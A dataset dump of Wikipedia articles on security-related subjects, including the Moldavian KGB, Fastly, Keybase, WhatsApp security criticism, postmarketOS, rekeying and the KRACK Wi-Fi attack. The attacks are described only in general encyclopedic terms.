id
stringlengths
4
8
url
stringlengths
32
188
title
stringlengths
2
122
text
stringlengths
143
226k
55252729
https://en.wikipedia.org/wiki/Committee%20for%20State%20Security%20of%20the%20Moldavian%20Soviet%20Socialist%20Republic
Committee for State Security of the Moldavian Soviet Socialist Republic
Committee for State Security of the Moldavian Soviet Socialist Republic (Russian: Комитет государственной безопасности Mолдавский ССР), also referred to as the KGB of the MSSR or the CSS of Moldavia, was the security agency of the Moldavian Soviet Socialist Republic, being the local branch of Committee for State Security of the USSR. On 9 September 1991, the KGB of the MSSR was transformed into the Ministry of National Security (now the Information and Security Service of the Republic of Moldova). Established in 1954, its rights were limited by the early 1960s, with the KGB border guard, once subordinated to the Moldavian KGB, reported directly to party leaders in Moscow. From July 1972 to its disbandment, the KGB was part of the Council of Ministers of the MSSR. From 1940 to 1991, all chairmen of the KGB were army generals. Today, modern Moldovan intelligence services are mostly based on the structure of the KGB, specifically its 5th Division. Structure Structure: Leadership (chairman, vice chairs, party committee) Secretariat 1st Division (intelligence) 2nd Division (counterintelligence) 4th Division (secret-political) 5th Division (economic) 7th Division (surveillance) 8th Division (encryption-decryption) 9th Division (protection of party and government leaders) 2nd Special Department 3rd Special Department 4th Special Department 5th Special Department Manufacturing Department Communication Department Investigation Department Archive Department Prison Department Human Resources Department Mobilization Department Auxiliary units Notable people investigated by the KGB Alexandru Şoltoianu – Founder of the National Patriotic Front Gheorghe Ghimpu – Romanian politician and political prisoner Valeriu Graur Alexandru Usatiuc-Bulgăr Sergiu Rădăuţan – Rector of the Chişinău Polytechnical Institute Nicolae Testemiţanu – Rector of the Chişinău State Medical Institute Boris Alexandru Găină – First Secretary of the Teleneshty Regional Committee of the CPM Chairmen Iosif Mordovets (May 6, 1954 – March 30, 1955) Andrei Prokopenko (March 30, 1955 – July 11, 1959) Ivan Savchenko (1959–1967) Piotr Chvertko (1967–1975) Arkady Ragozin (December 17, 1975 – January 19, 1979) Gavriil Volkov (January 19, 1979 – January 23, 1989), Georgiy Lavranchuk (January 23, 1989 – June 23, 1990), Fyodor Botnar (June 23, 1990 – August 29, 1991) Anatoly Plagara (August 29, 1991) References Moldavian Soviet Socialist Republic KGB
55307430
https://en.wikipedia.org/wiki/Fastly
Fastly
Fastly is an American cloud computing services provider. It describes its network as an edge cloud platform, which is designed to help developers extend their core cloud infrastructure to the edge of the network, closer to users. The Fastly edge cloud platform includes their content delivery network (CDN), image optimization, video and streaming, cloud security, and load balancing services. Fastly's cloud security services include denial-of-service attack protection, bot mitigation, and a web application firewall. Fastly web application firewall uses the Open Web Application Security Project ModSecurity Core Rule Set alongside its own ruleset. The Fastly platform is built on top of Varnish. As of December 2021, Fastly transfers 50-100tbps of data. History Fastly was founded in 2011 by Artur Bergman, previously chief technical officer at Wikia (now Fandom). In June 2013, Fastly raised $10 million in Series B funding. In April 2014, the company announced that they had acquired CDN Sumo, a CDN add-on for Heroku. In September 2014, Fastly raised a further $40 million in Series C funding, followed by a $75 million Series D round in August 2015. In September 2015, Google partnered with Fastly and other content delivery network providers to offer services to its users. In April 2017, Fastly launched its edge cloud platform along with image optimization, load balancing, and a web application firewall. Fastly raised $50 million in funding in April 2017, and another $40 million in July 2018. The company filed for an initial public offering (IPO) in April 2019 and debut on the New York Stock Exchange on May 17, 2019. In February 2020, Bergman stepped down as CEO and assumed the role of chief architect and executive chairperson; Joshua Bixby took over the CEO role. In August 2020, Fastly announced it was acquiring cybersecurity company Signal Sciences for $775 million ($200 million in cash and $575 million in stock). In June 2021, Ronald W. Kisling, previously employed by Alphabet as the CFO of the Fitbit division, was hired to serve as Fastly's CFO, succeeding Adriel Lares. He assumed the position in August 2021. Operation Fastly's CDN service follows the reverse proxy model, routing all website traffic through their own servers instead of providing a 'cdn.mydomain.com' address to store site-specific files. It then fetches content from the point of presence nearest to the location of the requesting user, out of nearly 60 worldwide. It is priced as a pay-as-you-go service subject to a US$50 per month minimum charge, with bandwidth charged at variable rates depending on region. Content is not directly uploaded to their servers, rather it is pulled periodically from the origin server and cached in order to reduce the time required for an end-user to access the content. Fastly supports the UDP based HTTP/3 protocol, as well as DRM enabled content, encryption and secure tokens to restrict media access. On 8 June 2021, Fastly reported problems with their CDN service which caused many major websites, such as Reddit, gov.uk, Twitch, Spotify and Amazon, along with major news sources such as The New York Times, The Guardian, CNN and the BBC, to become unavailable. Affected tech news outlet The Verge resorted to using Google Docs to report on the ongoing outage. It also affected certain parts of other major websites, such as the servers hosting the emojis used by Twitter, resulting in them becoming inaccessible. The outage was resolved by Fastly after a few hours. Fastly has since stated that the cause of the outage was a software bug triggered by a specific user configuration. References External links 2011 establishments in California 2019 initial public offerings American companies established in 2011 Cloud computing providers Cloud platforms Companies based in San Francisco Companies listed on the New York Stock Exchange Computer security companies Content delivery networks DDoS mitigation companies Internet properties established in 2011 Internet security Software companies based in the San Francisco Bay Area Software companies established in 2011 Software companies of the United States
55315654
https://en.wikipedia.org/wiki/Keybase
Keybase
Keybase is a key directory that maps social media identities to encryption keys (including, but not limited to PGP keys) in a publicly auditable manner. Additionally it offers an end-to-end encrypted chat and cloud storage system, called Keybase Chat and the Keybase Filesystem respectively. Files placed in the public portion of the filesystem are served from a public endpoint, as well as locally from a filesystem mounted by the Keybase client. Keybase supports publicly connecting Twitter, GitHub, Reddit, Hacker News, and Mastodon identities, including websites and domains under one's control, to encryption keys. It also supports Bitcoin, Zcash, Stellar, and QRL wallet addresses. Keybase has supported Coinbase identities since initial public release, but ceased to do so on March 17, 2017, when Coinbase terminated public payment pages. In general, Keybase allows for any service with public identities to integrate with Keybase. On May 7, 2020, Keybase announced it had been acquired by Zoom, as part of Zoom's "plan to further strengthen the security of our video communications platform". Identity proofs Keybase allows users to prove a link between certain online identities (such as a Twitter or Reddit account) and their encryption keys. Instead of using a system such as OAuth, identities are proven by posting a signed statement as the account a user wishes to prove ownership of. This makes identity proofs publicly verifiable – instead of having to trust that the service is being truthful, a user can find and check the relevant proof statements themselves, and the Keybase client does this automatically. App In addition to the web interface, Keybase offers a client application for Windows, Mac, Android, iOS, and most desktop Linux distributions, written in Go with an Electron front end. The app offers additional features to the website, such as the end-to-end encrypted chat, teams feature, and the ability to add files to and access private files in their personal and team Keybase Filesystem storage. Each device running the client app is authorized by a signature made either by another device or the user's PGP key. Each device is also given a per-device NaCl (pronounced "salt") key to perform cryptographic operations. Chat Keybase Chat is an end-to-end encrypted chat built in to Keybase launched in February 2017. A distinguishing feature of Keybase Chat is that it allows Keybase users to send messages to someone using their online aliases (for example a reddit account), even if they haven't signed up to Keybase yet. If the recipient (the online alias owner) has an account on Keybase, they will seamlessly receive the message. If the recipient doesn't have a Keybase account, and later signs up and proves the link between the online account and their devices, the sender's device will rekey the message for the recipient based on the public proof they posted, allowing them to read the message. Since the Keybase app checks the proof, it avoids trust on first use. Keybase Filesystem (KBFS) Keybase allows users to store up to 250 GB of files in a cloud storage called the Keybase Filesystem for free. There are no storage upgrades available, but paid plans allowing for more data are planned. The filesystem is divided into three parts: public files, private files, and team files. On Unix-like machines, the filesystem is mounted to /keybase, and on Microsoft Windows systems it is usually mounted to the K drive. Currently, mobile versions of the Keybase client can only download files from kbfs, and can not mount it. However, they do support operations such as rekeying files as necessary. In October 2017 Keybase brought out end-to-end encrypted Git repositories. Public files Public files are stored in /public/username, and are publicly visible. All files in the public filesystem are automatically signed by the client. Only the user who the folder is named after can edit its contents, however, a folder may be named after a comma-separated list of users (e.g. a folder /public/foo,bar,three would be editable by the users foo, bar, and three). Public files can be accessed by any user. Single user folders are displayed at and are also accessible by opening the directory in the mounted version of the filesystem. Multi user folders (such as /public/foo,bar,three) are only accessible through the mounted version of the system. Private files Private files are stored in /private/username, and are only visible to username. Private folders, like public folders, can be named after more than one user (e.g. a folder /private/foo,bar,three would be readable and editable by the users foo, bar, and three). Private files can also be read only for users after "#" (e.g. a folder /private/writer1,writer2,#reader1,reader2 would be readable and editable by the users writer1 and writer2 but only readable for reader1 and reader2). Unlike public files, all private files are both encrypted and signed before being uploaded, making them end-to-end encrypted. Team files Team files are stored in /team/teamname, and are publicly visible to team members. All files in the team filesystem are automatically encrypted and signed by the client. Only users who are marked as writers can edit its contents, however, any readers can access the files stored there. Teams In September 2017, Keybase launched Keybase Teams. A team is described as "...a named group of people." Each team has a private folder in the Keybase filesystem, and a number of chat channels (similar to Slack). Teams can also be divided into "subteams" by placing a . in the team name. For example, wikipedia.projects would be a subteam of wikipedia, while wikipedia.projects.foobar would be a subteam of wikipedia.projects (and therefore, also of wikipedia). Team administration Teams are largely administered by adding signatures to a chain. Each signature can add, remove, or change the membership of a user in a team, as well as when changes are made to subteams. Each chain starts with a signature made by the team owner, with subsequent actions signed on by team admins or users. This ensures that every action is made by an authorized user, and that actions can be verified by anyone in possession of the public key used. References External links Keybase on GitHub Key management OpenPGP Free software programmed in Go Tor onion services Computer-related introductions in 2014 2020 mergers and acquisitions
55361348
https://en.wikipedia.org/wiki/Digital%20Rights%20Watch
Digital Rights Watch
Digital Rights Watch is an Australian charity organisation founded in 2016 that aims to educate and uphold the digital rights of Australian citizens. History In 2016, largely in response to the introduction of Australia's mandatory metadata retention scheme, Digital Rights Watch was created at a meeting of representatives from Australian human rights organisations, activists, political advisers, technology consultants and academics. To coordinate a civil society response to the metadata retention scheme as well as other key digital rights violations, a new organisation was founded with the aim of aligning and supporting existing efforts. Focus Digital Rights Watch's mission is to ensure that Australian citizens are equipped, empowered and enabled to uphold their digital rights. The organisation works on advocacy, policy reform and public-facing campaigns that push for ethical data use by corporations, good digital government practices and policies, a rights-based legal system, and empowered and informed citizens. Structure Digital Rights Watch is an incorporated Association, registered as a national charity with the Australian Charities and Not-For-Profits Commission. It is a member-run organisation, with a board of directors elected once a year at its Annual General Meeting. The organisation also operates an Advisory Council, which informs and advises on policy and strategy. Digital Rights Watch is a member of the CIVICUS World Alliance for Citizen Participation, the Australian Digital Inclusion Alliance, and the global Keep It On campaign. In October 2017, Digital Rights Watch's Chair Tim Singleton Norton received a special mention in the Access Now Global Heroes and Villains of Human Rights Awards. Digital Rights Watch often works in partnerships with other Australian digital or human rights organisations such as the Human Rights Law Centre, Amnesty International Australia, Electronic Frontiers Australia, the Australian Privacy Foundation, ACFID and others. Digital Rights Watch also works with international groups such as Access Now, Electronic Frontiers Foundation, Open Media, EDRi, Privacy International and others. Campaigns In August 2016, Digital Rights Watch coordinated a campaign, including media coverage, expressing concern over privacy issues raised in the Australian national census. On 13 April 2017, Digital Rights Watch declared a national day of action against mandatory data retention, calling for all Australians to 'Get a VPN'. In August 2017, Digital Rights Watch hosted an event as part of the Melbourne Writers Festival in which they profiled the personal metadata footprint of Professor Gillian Triggs, former President of the Australian Human Rights Commission. In September 2017, Digital Rights Watch partnered with Privacy International to push for greater transparency over intelligence sharing operations between governments. In May 2018, Digital Rights Watch launched the State of Digital Rights report, outlining several ways that Australian citizen's digital rights are being eroded. Between October and December 2018, Digital Rights Watch coordinated a public campaign The Alliance for a Safe and Secure Internet against proposed legislation that gave increased powers to law enforcement to break encryption protocols. In May 2019, Digital Rights Watch partnered with Electronic Frontiers Australia to launch the Save Australian Technology campaign. References External links Digital Rights Watch website Digital Rights Watch ACNC register Political organisations based in Australia Privacy organizations Human rights organisations based in Australia Advocacy groups in Australia Digital rights organizations
55440919
https://en.wikipedia.org/wiki/SaferVPN
SaferVPN
SaferVPN is a VPN service developed by Safer Social, Ltd. The network protects user data from Wi-Fi security risks through end-to-end encryption of user connections. History SaferVPN was released in 2013 by cybersecurity software developers, including founders Amit Bareket and Sagi Gidali. SaferVPN’s parent company began raising capital after creating and patenting a system created to aid law enforcement in identifying and catching car thieves. In the Microsoft Imagine Cup competition the first application cofounders Amit Bareket and Sagi Gidali assembled together made second place. SaferVPN network infrastructure served as the basis of Bareket and Gidali next company, Perimeter 81 initial product development. Technology SaferVPN uses protocols to secure data that is transmitted over its network. Each protocol varies in how the data is secured. SaferVPN’s supported protocols include: OpenVPN, the commonly used protocol due to its performance and security level. Point-To-Point Tunneling Protocol (PPTP), a commonly used VPN protocol that uses basic encryption giving users fast connection speeds. Layer 2 Tunneling Protocol (L2TP/IPSec), secure but slower than other protocols. L2TP is a good option if OpenVPN or IKEv2 aren’t available. Unlike PPTP, L2TP/IPSec requires a shared key or the use of certificates. IKEv2, the newest protocol available. Fastest of all protocols, it is secure and stable but not supported on all platforms. See also Comparison of virtual private network services References Virtual private network services Software
55464554
https://en.wikipedia.org/wiki/Reception%20and%20criticism%20of%20WhatsApp%20security%20and%20privacy%20features
Reception and criticism of WhatsApp security and privacy features
This article provides a detailed chronological account of the historical reception and criticism of security and privacy features in the WhatsApp messaging service. 2011 On May 20, 2011, an unidentified security researcher from the Netherlands under the pseudonym "WhatsappHack" published a method to hijack WhatsApp accounts using a flaw in the authentication process, to the Dutch websites Tweakers.net and GeenStijl. The method involved trying to log in to a person's account from another phone number and intercepting the verification text message that would be sent out. "WhatsappHack" provided methods to accomplish this on both Symbian and Android operating systems. One day after the publication of the articles, WhatsApp issued a patch to both the Android and Symbian clients. In May 2011, another security hole was reported which left communication through WhatsApp susceptible to packet analysis. WhatsApp communications data was sent and received in plaintext, meaning messages could easily be read if packet traces were available. 2012 In May 2012 security researchers noticed that new updates of WhatsApp sent messages with encryption, but described the cryptographic method used as "broken." In August of the same year, the WhatsApp support staff stated that messages sent in the "latest version" of the WhatsApp software for iOS and Android (but not BlackBerry, Windows Phone, and Symbian) were encrypted, but did not specify the cryptographic method. On January 6, 2012, an unknown hacker published a website that made it possible to change the status of any WhatsApp user, so long as the phone number associated with the user's account was known. On January 9, WhatsApp reported that it had resolved the problem. In reality, WhatsApp's solution had been to block the website's IP address, which had allowed a Windows tool to be made that could accomplish the same thing. This problem has since been resolved by the institution of an IP address check on currently logged-in sessions. On September 14, 2012, Heise Security demonstrated how to use WhatsAPI to hijack any WhatsApp account. Shortly afterward, WhatsApp threatened to initiate legal action against the developers of WhatsAPI, an opensource project, and WhatsAPI temporarily took down their source code. This, however, did not address the underlying security failure and Heise Security claimed they had been able to successfully repeat the hacking of WhatsApp accounts. The WhatsAPI team has since resumed active development. 2013–2015 On March 31, 2013, the Saudi Arabia Communications and Information Technology Commission (CITC) issued a statement that mentioned possible measures against WhatsApp, among other applications, unless the service providers took serious steps to comply with monitoring and privacy regulations. In February 2014, the Schleswig-Holstein advised against using WhatsApp, as the service lacked privacy protection such as end-to-end client-side encryption technology. In late 2014, WhatsApp began its implementation of end-to-end encryption, which it finished in April 2016. A joint Canadian-Dutch government investigation was launched into several concerns over WhatsApps compliance with security regulations. The primary concern of the investigators was that WhatsApp required users to upload their mobile phone's entire address book, including contact information for contacts who were not using WhatsApp, to be mirrored on WhatsApp's servers. While WhatsApp stored these phone numbers in hash, the data was not salted. In late 2015, the Dutch government released a press statement claiming that WhatsApp had changed its hashing method, making it much harder to reverse, and thus subsequently complied with all rules and regulations. On December 1, 2014, Indrajeet Bhuyan and Saurav Kar demonstrated the WhatsApp Message Handler vulnerability, which allows anyone to remotely crash WhatsApp just by sending a specially crafted 2kb message. A user who receives the message must delete the whole conversation to avoid crashing WhatsApp upon opening the conversation. In early 2015, after WhatsApp launched a web client that can be used from the browser, Bhuyan found that the client had two new security issues: the WhatsApp photo privacy bug and the WhatsApp web photo sync bug. 2016 On March 2, 2016, WhatsApp introduced a document-sharing feature, that allows users to share PDF files with contacts. WhatsApp received criticism, however, about the default setting to automatically download attachments, which raised concerns about the downloading of malware and malicious files once the feature expands to include more than just PDFs. In August 2016, WhatsApp announced that it will start sharing account information such as the phone number of the account owner and aggregated analytical data, with Facebook. WhatsApp claims that the address books, message content, and metadata of users would not be shared. According to WhatsApp, this account information is shared to "track basic metrics about how often people use our services and better fight spam on WhatsApp. And by connecting your phone number with Facebook's systems, Facebook can offer better friend suggestions and show you more relevant ads if you have an account with them." It was further stated that "User data will not be shared with advertisers, and is only used internally on the Facebook services," and that users would be given the choice to opt-out of sharing this data with Facebook for advertisement purposes. In October 2016, the Article 29 Working Party stated that it has serious concerns regarding the way that the information relating to the updated Terms of Service and Privacy Policy was provided to users, and, consequently, about the validity of the users’ consent. From the latest client as of April 5, 2016, end-to-end encryption is supported for all of a user's communications, including file transfers and voice calls. It uses Curve25519 for key exchange, HKDF for generation of session keys (AES-256 in CBC mode for encryption and HMAC-SHA256 for integrity verification), and SHA512 for generating the two 30 digit fingerprints of both users' identity keys so that users can verify encryption. The encryption prevents even the company from being able to decrypt users' communications. This update was received well by security professionals and privacy enthusiasts, and the move was praised by Amnesty International. The US Federal Bureau of Investigation criticized the update as threatening the work of law enforcement. , WhatsApp has a score of 6 out of 7 points on the Electronic Frontier Foundation's "Secure Messaging Scorecard". It has received points for having communications encrypted in transit, having communications encrypted with keys the provider doesn't have access to, allowing users to verify contacts' identities, having past messages secure if the encryption keys are stolen, having completed a recent independent security audit, and having the security designs properly documented. The missing seventh point is for the code not being open to independent review. 2017 On January 15, 2017, a research team from Ruhr University Bochum published a security analysis of group messaging protocols in WhatsApp and other messaging services, that found a privacy concern in that WhatsApp's servers effectively control the membership in groups. The report found that it would be therefore possible to add arbitrary phone numbers to a group chat such that future communication becomes insecure. In October 2017, the German software company Open-Xchange criticized WhatsApp, among others, for using proprietary software and stated plans to create an open-source alternative. The Guardian Incident On January 13, 2017, The Guardian reported that security researcher Tobias Boelter had found WhatsApp's policy of forcing re-encryption of initially undelivered messages, without informing the recipient, to constitute a loophole whereby WhatsApp could disclose the content of these messages. WhatsApp and Open Whisper Systems officials disagreed with this assessment. After complaints from 73 security researchers, The Guardian substantially revised and corrected their articles, and a follow up article from Boelter was removed. In June 2017, The Guardian readers’ editor Paul Chadwick wrote that "The Guardian was wrong to report in January that the popular messaging service WhatsApp had a security flaw so serious that it was a huge threat to freedom of speech." Chadwick also noted that since the Guardian article, WhatsApp has been "better secured by the introduction of optional two-factor verification in February." 2019 In May 2019, it was revealed that there was a security vulnerability in WhatsApp, allowing a remote person to install a spyware just by making a call which does not even need to be answered. Later, in June 2019, another vulnerability was revealed, allowing a user to transform an audio call into a video call, without the victim consent and without the victim noticing. A bug bounty of US$5000 was offered for this bug. In December 2019, WhatsApp confirmed a security flaw that would allow hackers to use a malicious GIF image file to gain access to the recipient's data. The flaw was first reported by a user named Awakened on GitHub with an explanation of how the exploit worked. When the recipient opened the gallery within WhatsApp, even if not sending the malicious image, the hack is triggered and the device and its contents become vulnerable. The flaw was patched and users were encouraged to update WhatsApp. In June 2019, WhatsApp announced that it would take legal action against users who send disproportionately high number of messages using their communication platform. The company reiterated that its platform was meant for private messaging or for businesses to interact with their customers through their business app. In a notification on their website the company stated "Beginning on December 7, 2019, WhatsApp will take legal action against those we determine are engaged in or assisting others in abuse that violates our terms of service, such as automated or bulk messaging". In September 2019, WhatsApp was criticized for its implementation of a 'delete for everyone' feature. iOS users can elect to save media to their camera roll automatically. When a user deletes media for everyone, WhatsApp does not delete images saved in the iOS camera roll and so those users are able to keep the images. WhatsApp released a statement saying that "the feature is working properly," and that images stored in the camera roll cannot be deleted due to Apple's security layers. In December 2019, WhatsApp confirmed a security flaw that would allow hackers to use a malicious GIF image file to gain access to the recipient's data. When the recipient opened the gallery within WhatsApp, even if not sending the malicious image, the hack is triggered and the device and its contents become vulnerable. The flaw was patched and users were encouraged to update WhatsApp. In November 2019, WhatsApp released a new privacy feature that let users decide who adds them to the group. During the late 2019, a customized version of WhatsApp was developed by Anonymous developers named as GBWhatsApp. Although GB WhatsApp is the alternative to the original version, still it has a leading platform in the market just because it has the most updated and advanced features. It has many features that the original WhatsApp lack. They are almost the same in most features like interface, messages sending and receiving, and installation. On December 17, 2019, WhatsApp fixed a security flaw that allowed cyber attackers to repeatedly crash the messaging application for all members of group chat, which could only be fixed by forcing the complete uninstall and reinstall of the app. The bug was discovered by Check Point in August 2019 and reported to WhatsApp. It was fixed in version 2.19.246 onwards. 2020 In April 2020, WhatsApp sued the NSO Group for allegedly using the spyware it produces to hack at least 1,400 WhatsApp users. To which the company responded by claiming that it is not responsible for, nor can it control how its clients use its software. According to research by Citizen Lab countries which may have used the software to hack WhatsApp include, Saudi Arabia, Bahrain, Kazakhstan, Morocco, Mexico and the United Arab Emirates. On 16 December 2020, as part of an anti-trust case against Google, a complaint was made that WhatsApp gave Google access to private messages. The complaint was heavily redacted due to being part of an ongoing case, and therefore it cannot be determined if the claim alleges tampering with the app's end-to-end encryption, or Google accessing user backups. 2021 In January 2021, WhatsApp announced an update to its Privacy Policy which states that WhatsApp would collect the metadata of users and share it with Facebook and its "family of companies" starting in February 2021. Previously, users could opt-out of such data sharing, but this will no longer be an option. The new policy will not fully apply within the EU, in order to comply with the GDPR. The new policy will not allow WhatsApp to see or send messages, which are still end-to-end encrypted, but it will allow Facebook to see data such as what phone and operating system a user has, the user's time zone, IP address, profile picture, status, phone number, app usage, and all of the contacts which are stored in WhatsApp. This move has drawn intense criticism for Facebook and WhatsApp, with critics claiming that it erodes the users' privacy. Facing pushback and lack of clarity about Facebook data sharing, WhatsApp postponed the implementation of the updated privacy policy from February 8, 2021, to May 15, 2021, but announced they have no plans to limit the functionality of the app for those who don't approve the new terms or to give them persistent reminders to do so. ProPublica investigation In September 2021, ProPublica published an extensive investigation into WhatsApp's use of outside contractors and artificial intelligence systems to examine user communication, and its collaboration with law enforcement. The investigation includes information from a complaint filed by a whistleblower with the U.S. Securities and Exchange Commission. Internal WhatsApp company documents revealed Facebook's considerable efforts to brand WhatsApp as "a paragon of privacy". WhatsApp employs around 1000 contractors in their 20s and 30s, via Accenture, at offices in Austin, Texas, Dublin and Singapore. Their job is to review content reported by WhatsApp users, and pay starts at $16.50/hour. When a user flags a message they've received, it and the previous four messages are decrypted and sent to this content review team. A reviewer has less than a minute to decide whether to do nothing, place the user on a watch list, or ban them. Due to pranks, ambiguous content, language nuances and translation errors, the process is prone to misunderstandings. WhatsApp also uses artificial intelligence systems to scan unencrypted data collected from users (profile image and status; phone number, IMEI and OS; names and images of the user's WhatsApp groups; a list of the user's electronic devices; any Facebook or Instgram accounts) and compares it against suspicious patterns or terms and images previously deemed abusive. WhatsApp shares message metadata with law enforcement agencies such as the Department of Justice. If legally required, or at its own discretion (such as for investigating Facebook leaks), it can provide critical location or account information, or real-time data on the recipients messaged a target subject. WhatsApp message metadata has been used to help jail people such as whistleblower Natalie Edwards. In 2020, WhatsApp reported 400,000 instances of possible child-exploitation imagery to the National Center for Missing & Exploited Children. References 2020 WhatsApp WhatsApp WhatsApp WhatsApp
55479159
https://en.wikipedia.org/wiki/PostmarketOS
PostmarketOS
PostmarketOS (stylized as postmarketOS and abbreviated as pmOS) is a free and open-source operating system primarily for smartphones, based on the Alpine Linux distribution. PostmarketOS was launched on May 6, 2017 with the source code available on GitLab. It is capable of running different X and Wayland based user interfaces, such as Plasma Mobile, MATE, GNOME 3, and XFCE; later updates added support for Unity8 and Phosh. It is also capable of running Docker, if the device specific kernel has cgroups and relevant configs enabled. The project aims to provide a ten-year lifecycle for smartphones. Architecture Unlike many other projects porting conventional Linux distributions to Android phones, postmarketOS does not use the Android build system or userspace. Each phone has only one unique package, and flashable installation images are generated using the pmbootstrap tool. The project intends to support the mainline Linux kernel on all phones in the future, instead of the often outdated Android-specific fork, to reduce the potential for security exploits. A few devices can boot into the mainline kernel already. The project aims to support Android apps, originally through the use of Anbox, which was replaced by Waydroid since postmarketOS v21.12. Alpine Linux was chosen as the base distribution due to its low storage requirements, making it more suitable for older devices. Excluding the kernel, a base installation takes up approximately 6 MB. State of development Features Different tools have been published by the project, including: pmbootstrap, a utility to help the process of development with cross compilation; osk-sdl, a virtual keyboard to allow decryption of a password during startup (on a device with full disk encryption); charging-sdl, an application contained in the initramfs to display an animation when the phone is charging while off. Device support As of May 2020, over two hundred devices are able to boot the operating system, including 92 with WiFi support. This includes many smartphones and tablets that originally ran Android, as well as some Linux-based Nokia smartphones, such as the N900 and N9. After Corellium's Project Sandcastle ported the Linux kernel to some iPhone versions, postmarketOS was also seen to boot on it, although no persistent flashing is supported at the moment. As of May 2021, support for wearable devices (including Google Glass and smartwatches like the LG G Watch) has been improved through integration with the AsteroidOS user interface and work on mainline kernel for the LG G Watch R. In 2018, no devices were yet able to make phone calls with PostmarketOS, although significant efforts were being made in this regard. By 2020, a number of devices were fully or mostly supported, including for phone calls, SMS messages and mobile data. These included the BQ Aquaris X5, Librem 5, Nokia N900, Motorola Moto G4 Play, Samsung Galaxy A3 (2015), Samsung Galaxy A5 (2015), and Wileyfox Swift. Furthermore, the device was launched as a first-party operating system for the PinePhone, with the postmarketOS Community Edition. Porting to a new device The development process to make a new device compatible with the operating system consists of creating a phone-specific package using the pmbootstrap tool. For that, the use of the Linux kernel from the device's original manufacturer is often necessary. The source code of the original kernel is often made available by compliance with the requirements of the GPLv2 license, but some drivers necessary for the operation of the device may not be available, and must, therefore, be recreated. Examples include GPU drivers such as Lima, which has a proprietary equivalent in userspace on Android that is not subject to the GPLv2 requirements. Gallery See also List of open-source mobile phones Librem 5 PinePhone Android rooting Comparison of mobile operating systems LineageOS Replicant Ubuntu Touch Sailfish OS LuneOS Plasma Mobile References External links Source code on GitLab Embedded Linux distributions Free mobile software Linux distributions without systemd Software forks Linux distributions
55500399
https://en.wikipedia.org/wiki/Rekeying%20%28cryptography%29
Rekeying (cryptography)
In cryptography, rekeying refers to the process of changing the session key—the encryption key of an ongoing communication—in order to limit the amount of data encrypted with the same key. Roughly equivalent to the classical procedure of changing codes on a daily basis, the key is changed after a pre-set volume of data has been transmitted or a given period of time has passed. In contemporary systems, rekeying is implemented by forcing a new key exchange, typically through a separate protocol like Internet key exchange (IKE). The procedure is handled transparently to the user. A prominent application is Wi-Fi Protected Access (WPA), the extended security protocol for wireless networks that addresses the shortcomings of its predecessor, WEP, by frequently replacing session keys through the Temporal Key Integrity Protocol (TKIP), thus defeating some well-known key recovery attacks. In public key infrastructure, rekeying (or "re-keying") leads to issuance of new certificate (in contrast to certificate renewal - issuance of new certificate for the same key, which is usually not allowed by CAs). See also Diffie–Hellman key exchange Elliptic-curve Diffie-Hellman IPsec and Internet key exchange (IKE) Over the Air Rekeying (OTAR) References External links OpenSSH: KeyRegenerationInterval parameter, ~R command Encryption devices
55546507
https://en.wikipedia.org/wiki/KRACK
KRACK
KRACK ("Key Reinstallation Attack") is a replay attack (a type of exploitable flaw) on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. It was discovered in 2016 by the Belgian researchers Mathy Vanhoef and Frank Piessens of the University of Leuven. Vanhoef's research group published details of the attack in October 2017. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic. The weakness is exhibited in the Wi-Fi standard itself, and not due to errors in the implementation of a sound standard by individual products or implementations. Therefore, any correct implementation of WPA2 is likely to be vulnerable. The vulnerability affects all major software platforms, including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. The widely used open-source implementation wpa_supplicant, utilized by Linux and Android, was especially susceptible as it can be manipulated to install an all-zeros encryption key, effectively nullifying WPA2 protection in a man-in-the-middle attack. Version 2.7 fixed this vulnerability. The security protocol protecting many Wi-Fi devices can essentially be bypassed, potentially allowing an attacker to intercept sent and received data. Details The attack targets the four-way handshake used to establish a nonce (a kind of "shared secret") in the WPA2 protocol. The standard for WPA2 anticipates occasional Wi-Fi disconnections, and allows reconnection using the same value for the third handshake (for quick reconnection and continuity). Because the standard does not require a different key to be used in this type of reconnection, which could be needed at any time, a replay attack is possible. An attacker can repeatedly re-send the third handshake of another device's communication to manipulate or reset the WPA2 encryption key. Each reset causes data to be encrypted using the same values, so blocks with the same content can be seen and matched, working backwards to identify parts of the keychain which were used to encrypt that block of data. Repeated resets gradually expose more of the keychain until eventually the whole key is known, and the attacker can read the target's entire traffic on that connection. According to US-CERT: "US-CERT has become aware of several key management vulnerabilities in the 4-way handshake of the Wi-Fi Protected Access II (WPA2) security protocol. The impact of exploiting these vulnerabilities includes decryption, packet replay, TCP connection hijacking, HTTP content injection, and others. Note that as protocol-level issues, most or all correct implementations of the standard will be affected. The CERT/CC and the reporting researcher KU Leuven, will be publicly disclosing these vulnerabilities on 16 October 2017." The paper describing the vulnerability is available online, and was formally presented at the ACM Conference on Computer and Communications Security on 1 November 2017. US-CERT is tracking this vulnerability, listed as VU#228519, across multiple platforms. The following CVE identifiers relate to the KRACK vulnerability: and . Some WPA2 users may counter the attack by updating Wi-Fi client and access point device software, if they have devices for which vendor patches are available. However, vendors may delay in offering a patch, or not provide patches at all in the case of many older devices. Patches Patches are available for different devices to protect against KRACK, starting at these versions: Workarounds In order to mitigate risk on vulnerable clients, some WPA2-enabled Wi-Fi access points have configuration options that can disable EAPOL-Key frame re-transmission during key installation. Attackers cannot cause re-transmissions with a delayed frame transmission, thereby denying them access to the network, provided TDLS is not enabled. One disadvantage of this method is that, with poor connectivity, key reinstallation failure may cause failure of the Wi-Fi link. Continued vulnerability In October 2018, reports emerged that the KRACK vulnerability was still exploitable in spite of vendor patches, through a variety of workarounds for the techniques used by vendors to close off the original attack. See also KrØØk IEEE 802.11r-2008 – Problem in 802.11r fast BSS transition (FT) Wireless security WPA3 References External links krackattacks.com Community-maintained vendor response matrix for KRACK Computer-related introductions in 2017 Computer security exploits Telecommunications-related introductions in 2017 Wi-Fi
55557278
https://en.wikipedia.org/wiki/Surface%20Book%202
Surface Book 2
